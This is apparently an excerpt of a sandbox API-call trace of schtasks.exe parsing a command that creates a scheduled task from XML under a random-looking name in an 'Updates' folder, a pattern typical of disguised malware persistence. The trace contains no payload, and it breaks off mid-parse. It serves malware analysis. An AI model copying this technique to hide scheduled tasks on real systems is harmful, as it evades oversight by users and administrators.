[0193.564] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x477a798, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0193.564] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0193.564] GetProcessHeap () returned 0x4770000
[0193.564] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x30) returned 0x47770d0
[0193.564] _vsnwprintf (in: _Buffer=0x47769e0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdcf5c | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37
[0193.564] GetProcessHeap () returned 0x4770000
[0193.564] GetProcessHeap () returned 0x4770000
[0193.564] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779db8) returned 1
[0193.564] GetProcessHeap () returned 0x4770000
[0193.564] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779db8) returned 0x776
[0193.564] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779db8) returned 1
[0193.564] RtlRestoreLastWin32Error () returned 0x0
[0193.565] GetThreadLocale () returned 0x409
[0193.565] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.565] lstrlenW (lpString="create") returned 6
[0193.565] GetThreadLocale () returned 0x409
[0193.565] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.565] lstrlenW (lpString="?") returned 1
[0193.565] GetThreadLocale () returned 0x409
[0193.565] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.565] lstrlenW (lpString="s") returned 1
[0193.565] GetThreadLocale () returned 0x409
[0193.565] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="u") returned 1
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="p") returned 1
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="ru") returned 2
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="rp") returned 2
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="sc") returned 2
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="mo") returned 2
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="d") returned 1
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="m") returned 1
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="i") returned 1
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="tn") returned 2
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="tr") returned 2
[0193.566] GetThreadLocale () returned 0x409
[0193.566] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.566] lstrlenW (lpString="st") returned 2
[0193.566] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="sd") returned 2
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="ed") returned 2
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="it") returned 2
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="et") returned 2
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="k") returned 1
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="du") returned 2
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="ri") returned 2
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="z") returned 1
[0193.567] GetThreadLocale () returned 0x409
[0193.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.567] lstrlenW (lpString="f") returned 1
[0193.568] GetThreadLocale () returned 0x409
[0193.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.568] lstrlenW (lpString="v1") returned 2
[0193.568] GetThreadLocale () returned 0x409
[0193.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.568] lstrlenW (lpString="xml") returned 3
[0193.568] GetThreadLocale () returned 0x409
[0193.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.568] lstrlenW (lpString="ec") returned 2
[0193.568] GetThreadLocale () returned 0x409
[0193.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.568] lstrlenW (lpString="rl") returned 2
[0193.568] GetThreadLocale () returned 0x409
[0193.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.568] lstrlenW (lpString="delay") returned 5
[0193.568] GetThreadLocale () returned 0x409
[0193.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.568] lstrlenW (lpString="np") returned 2
[0193.568] GetThreadLocale () returned 0x409
[0193.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0193.568] lstrlenW (lpString="hresult") returned 7
[0193.568] RtlRestoreLastWin32Error () returned 0x0
[0193.568] RtlRestoreLastWin32Error () returned 0x0
[0193.568] lstrlenW (lpString="/Create") returned 7
[0193.568] lstrlenW (lpString="-/") returned 2
[0193.568] StrChrIW (lpStart="-/", wMatch=0x4a3002f) returned="/"
[0193.569] lstrlenW (lpString="create") returned 6
[0193.569] lstrlenW (lpString="create") returned 6
[0193.569] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.569] lstrlenW (lpString="Create") returned 6
[0193.569] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.569] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8
[0193.569] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|Create|") returned 8
[0193.569] lstrlenW (lpString="|create|") returned 8
[0193.569] lstrlenW (lpString="|Create|") returned 8
[0193.569] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0193.569] RtlRestoreLastWin32Error () returned 0x0
[0193.569] RtlRestoreLastWin32Error () returned 0x0
[0193.569] RtlRestoreLastWin32Error () returned 0x0
[0193.569] lstrlenW (lpString="/TN") returned 3
[0193.569] lstrlenW (lpString="-/") returned 2
[0193.569] StrChrIW (lpStart="-/", wMatch=0x4a3002f) returned="/"
[0193.569] lstrlenW (lpString="create") returned 6
[0193.569] lstrlenW (lpString="create") returned 6
[0193.569] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.569] lstrlenW (lpString="TN") returned 2
[0193.569] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.569] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8
[0193.569] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.570] lstrlenW (lpString="|create|") returned 8
[0193.570] lstrlenW (lpString="|TN|") returned 4
[0193.570] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0193.570] RtlRestoreLastWin32Error () returned 0x490
[0193.570] lstrlenW (lpString="?") returned 1
[0193.570] lstrlenW (lpString="?") returned 1
[0193.570] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.570] lstrlenW (lpString="TN") returned 2
[0193.570] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.570] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3
[0193.570] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.570] lstrlenW (lpString="|?|") returned 3
[0193.570] lstrlenW (lpString="|TN|") returned 4
[0193.570] RtlRestoreLastWin32Error () returned 0x490
[0193.570] lstrlenW (lpString="s") returned 1
[0193.570] lstrlenW (lpString="s") returned 1
[0193.570] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.570] lstrlenW (lpString="TN") returned 2
[0193.570] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.570] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3
[0193.570] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.570] lstrlenW (lpString="|s|") returned 3
[0193.570] lstrlenW (lpString="|TN|") returned 4
[0193.570] RtlRestoreLastWin32Error () returned 0x490
[0193.570] lstrlenW (lpString="u") returned 1
[0193.570] lstrlenW (lpString="u") returned 1
[0193.570] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.570] lstrlenW (lpString="TN") returned 2
[0193.570] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.571] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3
[0193.571] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.571] lstrlenW (lpString="|u|") returned 3
[0193.571] lstrlenW (lpString="|TN|") returned 4
[0193.571] RtlRestoreLastWin32Error () returned 0x490
[0193.571] lstrlenW (lpString="p") returned 1
[0193.571] lstrlenW (lpString="p") returned 1
[0193.571] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.571] lstrlenW (lpString="TN") returned 2
[0193.571] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.571] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3
[0193.571] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.571] lstrlenW (lpString="|p|") returned 3
[0193.571] lstrlenW (lpString="|TN|") returned 4
[0193.571] RtlRestoreLastWin32Error () returned 0x490
[0193.571] lstrlenW (lpString="ru") returned 2
[0193.571] lstrlenW (lpString="ru") returned 2
[0193.571] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.571] lstrlenW (lpString="TN") returned 2
[0193.571] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.571] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4
[0193.571] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.571] lstrlenW (lpString="|ru|") returned 4
[0193.571] lstrlenW (lpString="|TN|") returned 4
[0193.571] StrStrIW (lpFirst="|ru|", lpSrch="|TN|") returned 0x0
[0193.572] RtlRestoreLastWin32Error () returned 0x490
[0193.572] lstrlenW (lpString="rp") returned 2
[0193.572] lstrlenW (lpString="rp") returned 2
[0193.572] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.572] lstrlenW (lpString="TN") returned 2
[0193.572] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.572] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4
[0193.572] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.572] lstrlenW (lpString="|rp|") returned 4
[0193.572] lstrlenW (lpString="|TN|") returned 4
[0193.572] StrStrIW (lpFirst="|rp|", lpSrch="|TN|") returned 0x0
[0193.572] RtlRestoreLastWin32Error () returned 0x490
[0193.572] lstrlenW (lpString="sc") returned 2
[0193.572] lstrlenW (lpString="sc") returned 2
[0193.572] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.572] lstrlenW (lpString="TN") returned 2
[0193.572] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.572] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4
[0193.572] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.572] lstrlenW (lpString="|sc|") returned 4
[0193.572] lstrlenW (lpString="|TN|") returned 4
[0193.572] StrStrIW (lpFirst="|sc|", lpSrch="|TN|") returned 0x0
[0193.572] RtlRestoreLastWin32Error () returned 0x490
[0193.572] lstrlenW (lpString="mo") returned 2
[0193.572] lstrlenW (lpString="mo") returned 2
[0193.572] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.573] lstrlenW (lpString="TN") returned 2
[0193.573] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.573] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4
[0193.573] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.573] lstrlenW (lpString="|mo|") returned 4
[0193.573] lstrlenW (lpString="|TN|") returned 4
[0193.573] StrStrIW (lpFirst="|mo|", lpSrch="|TN|") returned 0x0
[0193.573] RtlRestoreLastWin32Error () returned 0x490
[0193.573] lstrlenW (lpString="d") returned 1
[0193.573] lstrlenW (lpString="d") returned 1
[0193.573] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.573] lstrlenW (lpString="TN") returned 2
[0193.573] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.573] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3
[0193.573] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.573] lstrlenW (lpString="|d|") returned 3
[0193.573] lstrlenW (lpString="|TN|") returned 4
[0193.573] RtlRestoreLastWin32Error () returned 0x490
[0193.573] lstrlenW (lpString="m") returned 1
[0193.573] lstrlenW (lpString="m") returned 1
[0193.573] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.573] lstrlenW (lpString="TN") returned 2
[0193.573] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.574] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3
[0193.574] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.574] lstrlenW (lpString="|m|") returned 3
[0193.574] lstrlenW (lpString="|TN|") returned 4
[0193.574] RtlRestoreLastWin32Error () returned 0x490
[0193.574] lstrlenW (lpString="i") returned 1
[0193.574] lstrlenW (lpString="i") returned 1
[0193.574] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.574] lstrlenW (lpString="TN") returned 2
[0193.574] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.574] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3
[0193.574] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.574] lstrlenW (lpString="|i|") returned 3
[0193.574] lstrlenW (lpString="|TN|") returned 4
[0193.574] RtlRestoreLastWin32Error () returned 0x490
[0193.574] lstrlenW (lpString="tn") returned 2
[0193.574] lstrlenW (lpString="tn") returned 2
[0193.574] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.574] lstrlenW (lpString="TN") returned 2
[0193.574] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.574] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4
[0193.574] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0193.574] lstrlenW (lpString="|tn|") returned 4
[0193.574] lstrlenW (lpString="|TN|") returned 4
[0193.574] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|"
[0193.574] RtlRestoreLastWin32Error () returned 0x0
[0193.574] RtlRestoreLastWin32Error () returned 0x0
[0193.574] lstrlenW (lpString="Updates\\xErAccEJcQLD") returned 20
[0193.575] lstrlenW (lpString="-/") returned 2
[0193.575] StrChrIW (lpStart="-/", wMatch=0x4a30055) returned 0x0
[0193.575] RtlRestoreLastWin32Error () returned 0x490
[0193.575] RtlRestoreLastWin32Error () returned 0x490
[0193.575] RtlRestoreLastWin32Error () returned 0x0
[0193.575] lstrlenW (lpString="Updates\\xErAccEJcQLD") returned 20
[0193.575] StrChrIW (lpStart="Updates\\xErAccEJcQLD", wMatch=0x3a) returned 0x0
[0193.575] RtlRestoreLastWin32Error () returned 0x490
[0193.575] RtlRestoreLastWin32Error () returned 0x0
[0193.575] lstrlenW (lpString="Updates\\xErAccEJcQLD") returned 20
[0193.575] RtlRestoreLastWin32Error () returned 0x0
[0193.575] RtlRestoreLastWin32Error () returned 0x0
[0193.575] lstrlenW (lpString="/XML") returned 4
[0193.575] lstrlenW (lpString="-/") returned 2
[0193.575] StrChrIW (lpStart="-/", wMatch=0x4a3002f) returned="/"
[0193.575] lstrlenW (lpString="create") returned 6
[0193.575] lstrlenW (lpString="create") returned 6
[0193.575] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.575] lstrlenW (lpString="XML") returned 3
[0193.575] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.575] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8
[0193.575] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.575] lstrlenW (lpString="|create|") returned 8
[0193.576] lstrlenW (lpString="|XML|") returned 5
[0193.576] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0193.576] RtlRestoreLastWin32Error () returned 0x490
[0193.576] lstrlenW (lpString="?") returned 1
[0193.576] lstrlenW (lpString="?") returned 1
[0193.576] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.576] lstrlenW (lpString="XML") returned 3
[0193.576] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.576] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3
[0193.576] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.576] lstrlenW (lpString="|?|") returned 3
[0193.576] lstrlenW (lpString="|XML|") returned 5
[0193.576] RtlRestoreLastWin32Error () returned 0x490
[0193.576] lstrlenW (lpString="s") returned 1
[0193.576] lstrlenW (lpString="s") returned 1
[0193.576] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.576] lstrlenW (lpString="XML") returned 3
[0193.576] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.576] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3
[0193.576] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.576] lstrlenW (lpString="|s|") returned 3
[0193.576] lstrlenW (lpString="|XML|") returned 5
[0193.576] RtlRestoreLastWin32Error () returned 0x490
[0193.576] lstrlenW (lpString="u") returned 1
[0193.576] lstrlenW (lpString="u") returned 1
[0193.576] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.577] lstrlenW (lpString="XML") returned 3
[0193.577] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.577] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3
[0193.577] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.577] lstrlenW (lpString="|u|") returned 3
[0193.577] lstrlenW (lpString="|XML|") returned 5
[0193.577] RtlRestoreLastWin32Error () returned 0x490
[0193.577] lstrlenW (lpString="p") returned 1
[0193.577] lstrlenW (lpString="p") returned 1
[0193.577] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.577] lstrlenW (lpString="XML") returned 3
[0193.577] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.577] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3
[0193.577] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.577] lstrlenW (lpString="|p|") returned 3
[0193.577] lstrlenW (lpString="|XML|") returned 5
[0193.577] RtlRestoreLastWin32Error () returned 0x490
[0193.577] lstrlenW (lpString="ru") returned 2
[0193.577] lstrlenW (lpString="ru") returned 2
[0193.577] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.577] lstrlenW (lpString="XML") returned 3
[0193.577] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.577] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4
[0193.577] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.577] lstrlenW (lpString="|ru|") returned 4
[0193.578] lstrlenW (lpString="|XML|") returned 5
[0193.578] RtlRestoreLastWin32Error () returned 0x490
[0193.578] lstrlenW (lpString="rp") returned 2
[0193.578] lstrlenW (lpString="rp") returned 2
[0193.578] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.578] lstrlenW (lpString="XML") returned 3
[0193.578] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.578] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4
[0193.578] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.578] lstrlenW (lpString="|rp|") returned 4
[0193.578] lstrlenW (lpString="|XML|") returned 5
[0193.578] RtlRestoreLastWin32Error () returned 0x490
[0193.578] lstrlenW (lpString="sc") returned 2
[0193.578] lstrlenW (lpString="sc") returned 2
[0193.578] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.578] lstrlenW (lpString="XML") returned 3
[0193.578] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.578] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4
[0193.578] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0193.578] lstrlenW (lpString="|sc|") returned 4
[0193.578] lstrlenW (lpString="|XML|") returned 5
[0193.578] RtlRestoreLastWin32Error () returned 0x490
[0193.578] lstrlenW (lpString="mo") returned 2
[0193.578] lstrlenW (lpString="mo") returned 2
[0193.578] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.578] lstrlenW (lpString="XML") returned 3
